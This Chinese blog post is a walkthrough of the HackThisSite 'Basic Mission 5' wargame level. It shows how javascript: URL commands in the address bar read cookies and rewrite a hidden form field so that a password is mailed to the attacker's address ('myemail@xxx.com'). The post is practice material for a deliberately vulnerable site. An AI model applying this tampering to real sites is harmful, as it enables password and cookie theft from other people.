[HTS][Basic Mission5]Javascript Injection
Posted on 2010-03-13 20:26 xuczhang 阅读(248) 评论(0) 编辑 收藏 举报HTS Basic Mission 5
在这个任务中要用到有关JavaScript Injection的技术,Forum给了一个Hint的教程,这里写一下如果通过Javascript Injection技术来通过这关。
1 <form action="/missions/basic/5/level5.php" method="post">
<input type="hidden" name="to" value="webmaster@hulla-balloo.com" />
2 <input type="submit" value="Send password to Sam" />
</form>
有如上form,会将密码传到webmaster@hulla-balloo.com这个邮箱。我们现在要做的就是将密码传到自己的邮箱中。
这里先介绍两个JavaScript的命令(在浏览器中的地址栏中输入)
1. alert
比如弹出提示框打印Hello:javascript:alert('Hello');
查看cookie的信息:javascript:alert(document.cookie);
2.void
修改当前html中的值,如:
javascript:void(document.cookie="Field = myValue"); 就可以将cookie中的Field键的值改成myValue。
下面言归正传,利用上面的技术怎么将要发送的邮箱改为自己的呢?就是用void指令修改这个值。
javascript:void(document.forms[0].to.value="myemail@xxx.com")